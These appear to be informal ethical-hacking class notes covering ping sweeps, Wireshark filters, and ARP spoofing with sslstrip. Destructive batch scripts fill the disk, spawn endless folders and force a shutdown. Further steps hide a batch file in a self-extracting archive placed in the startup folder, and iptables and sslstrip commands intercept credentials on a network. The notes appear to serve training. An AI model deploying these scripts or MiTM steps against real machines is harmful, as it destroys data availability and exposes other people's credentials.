buffer demo 2

1. Shell SCripting
2. ---------------
3.  
4. Tool -> netdiscover
5.  
6.  
7. Tool -> nmap
8.  
9.  
10. Linux OS -
11.  
12.  
13. Editor -> gedit | nano | leafpad | vi | vim etc
14.  
15.  
16. Extension : .sh
17.  
18. file name ----> scann.sh
19.  
20. #/bin/bash/
21. ping www.google.com
22.  
23. ----exit------
24. chmod 777 scann.sh
25.  
26. netdiscover -> machines are runing in my network
27.  
28.  
29.  
30. #/bin/bash/
31. ping -c 1 172.16.3.134 |grep "64 bytes"
32. ping -c 1 172.16.3.136 |grep "64 bytes"
33. ping -c 1 172.16.3.137 |grep "64 bytes"
34. ping -c 1 172.16.3.145 |grep "64 bytes"
35.  
36.  
37. 192.168.0.23
38. 192.168.0.0-192.168.0.255
39.  
40.  
41. for(i = 0; i < 10;i++)
42. {
43. print i;
44. }
45.  
46. 0
47. 1
48. 2
49. 3
50. 4
51. 5
52. 6
53. 7
54. 8
55. 9
56.  
57.  
58.  
59.  
60.  
61. 192.168.0.12
62. 192.168.0.0-192.168.0.255
63. 192.168.0.1
64. 192.168.0.2
65. 192.168.0.3
66.  
67.  
68. 192.168.0.255
69.  
70. #/bin/bash/
71. for ip in $(seq 1 255);do
72. ping -c 1 172.16.3.$ip |grep "ttl" |cut -d " " -f4 |cut -d ":" -f1
73. done
74.  
75.  
76.  
77. Batch SCripting
78. ----------------
79.  
80. Editor -> Notepad
81.  
82. Extension: .bat
83.  
84.  
85. for creating randon folders
86. :banao
87. mkdir %random%
88. goto banao
89.  
90.  
91.  
92. for eating up the space in hard disk
93. :space
94. type chotu.txt>>chotu.txt
95. goto space
96.  
97.  
98. :space
99. echo "hello">>chotu.txt
100. goto space
101.  
102.  
103.  
104. @echo off
105.  
106. Random Folder
107. Shutdown
108.  
109. shutdown -s -t 10 -c "Hacked by Neha Mam"
110.  
111.  
112. SFX ->
113. 1. create a .bat file
114. 2. right click on batch file
115. 3. Add a archive
116. 4. SFX
117. 5. Advacnce tab ---> SFX Option
118. 6. goto general tab ---> path
119. 7. Goto update tab --> select middle option for both the items
120. 8. Goto setup --> provide the path of startup
121. 9. goto Modes --> select hide all.
122. 10. click OK
123. 11. Click ok.....
124.  
125.  
126. ======================================================================
127. Wireshark --> it is traffic monitoring tool.... it is not a attacking tool but traffic monitiong tool..... destination IP, source IP, PORT, PROTOCOL, Data send or received ----. It is mufat ka tool....
128. It is a open souce chota sa tool which is used by all department of Indian Cyber to monitor the traffic.....
129.  
130.  
131. Filters:
132. --------
133.  
134. For Filtering particular "source"
135. 1. ip.src == 1.2.3.4
136.  
137. For Filtering particular "protocol"
138. 2. dns
139.  
140. Using multiple Filters
141. 3. dns && ip.src == 1.2.3.4
142.  
143. Filtering particular Destination
144. 4. ip.dst == 1.2.3.4
145.  
146. Filtering Multiple Sources (Both Condition should be True)
147. 5. ip.src == 1.2.3.4 && ip.src == 2.3.4.5
148.  
149. Filtering Multiple Sources (Any Condition should be True)
150. 6. ip.src == 1.2.3.4 || ip.src == 1.2.3.4
151.  
152. Either this address in source or destination
153. 7. ip.addr == 1.2.3.4
154.  
155. Not Condition (Dont want to view this source)
156. 8. !(ip.src == 172.16.3.137)
157.  
158. Mutiple filters and both should be true as this is having &&
159. 9. ip.src == 172.16.3.137 && !(ip.dst == 172.16.3.2)
160.  
161. For filtering packets on basis of data it contains
162. 10. tcp contains icici
163.  
164. For filtering pckets contains password
165. 11. http.request.method == "POST"
166.  
167.  
168. double click the create sfx file.. it will be added in the startup
169.  
170.  
171.  
172.  
173.  
174.  
175.  
176. ARP SPOOFING
177. ------------
178. Adress Resolution Protocol ---> IP Address to MAC Address
179.  
180. ettercap ---> tool which is used to perform MiTM
181. MiTM --> Man-in-Middle-Attcak
182. HTTP --> password and user ko capture --> spoof
183. HTTPS --> s--> secure --> SSL --> Secure Socket Layer---X
184.  
185. >echo "1" > /proc/sys/net/ipv4/ip_forward
186. >iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 ----> HTTPS --- HTTP conversion
187. >sslstrip -l 8080
188.  
189.  
190.  
191.  
192.  
193. ======================================
194.  
195. Resume :
196.  
197. Linkedin :
198.  
199. Naukri:
200.  
201. jobs.null.com
202.  
203. Skills:
204.  
205. Desktop Security
206. Wireless Security
207. Web Security
208. Network Security
209. OWASP TOP 10
210. Email Security
211. VAPT
212. Firewall
213. Application Security
214.  
215. Tools Knowledge:
216. ----------------
217.  
218. Nmap
219. netdiscover
220. ettercap
221. wireshark
222. Aircrack
223. hashcat
224. metasploit
225. Burpsuite
226. SET
227. **recuva
228. ollydbg
229. fluxion
230. Nessus
231. **Armitage
232. Airodump
233. Acunetix
234. ***wash***
235. Mod Security (WAF)
236. sqlmap
237. ***dirb
238. havij
239. ***mdk3
240. zenmap | Angry ip scanner | advanced ip scanner
241. Maltego
242. ***wpsccan
243. hping3
244. OWASP ZAP (Autoated OWASP Zed Attack )
245. crunch
246. Aireplay
247. airmon
248. wifite
249. reaver
250. urlsnarf
251. driftnet
252. sslstrip
253. DVWA | WAVE
254. wordpress
255. uniscan*
256. stools
257. RouterScanner
258. Netsparker
259. lynris
260. hydra
261. johntheripper
262.  
263.  
264. Tools to do:
265.  
266. Sparta
267. Dnsenum
268. dnsmap
269. wafw00f -> to check wheather a website is having firewall or not
270. Websploit
271. Routersploit
272.  
273. ===========================================